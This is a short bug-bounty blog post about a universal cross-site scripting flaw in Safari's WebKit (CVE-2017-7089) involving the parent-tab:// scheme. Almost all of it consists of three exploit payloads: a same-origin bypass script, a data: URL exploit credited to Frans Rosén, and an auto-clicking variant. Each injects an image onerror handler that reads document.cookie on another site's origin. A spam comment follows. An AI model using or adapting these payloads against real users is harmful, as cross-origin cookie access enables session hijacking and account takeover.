Home Bug bounty Safari universal cross site scripting

Safari universal cross site scripting

302
1

The issue involves the “WebKit” component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing.

Local SOP bypass

<script> function Pew(){var doc=open(parent-tab://apple.com);doc.document.body.innerHTML=<img src=q onerror=alert(document.cookie)>;}</script><button onclick=Pew();>Click me!</button>

Exploit by Frans Rosén

data:text/html,<script>function y(){x=open(parent-tab://google.com,_top),x.document.body.innerHTML=<img/src=””onerror=”alert(document.cookie)”>};setTimeout(y,100)</script>

Both script is given in github CVE-2017-7089

New XSS attack

<body onload=document.getElementById(‘pew’).click()> <a id=’pew’ href=’data:text/html,<script>function y(){x=open(&#x27;parent-tab://apple.com&#x27;,&#x27;_top&#x27;),x.document.body.innerHTML=&#x27;<img/src=””onerror=alert(document.domain);alert(document.cookie);>&#x27;};setTimeout(y,100)</script>’>hello</a> </body>

1 COMMENT

  1. Whats up very nice site!! Guy .. Excellent .. Amazing ..
    I will bookmark your blog and take the feeds also? I am glad to find a lot of useful info right here in the publish, we want work out more techniques on this regard, thanks for sharing.
    . . . . .

LEAVE A REPLY

Please enter your comment!
Please enter your name here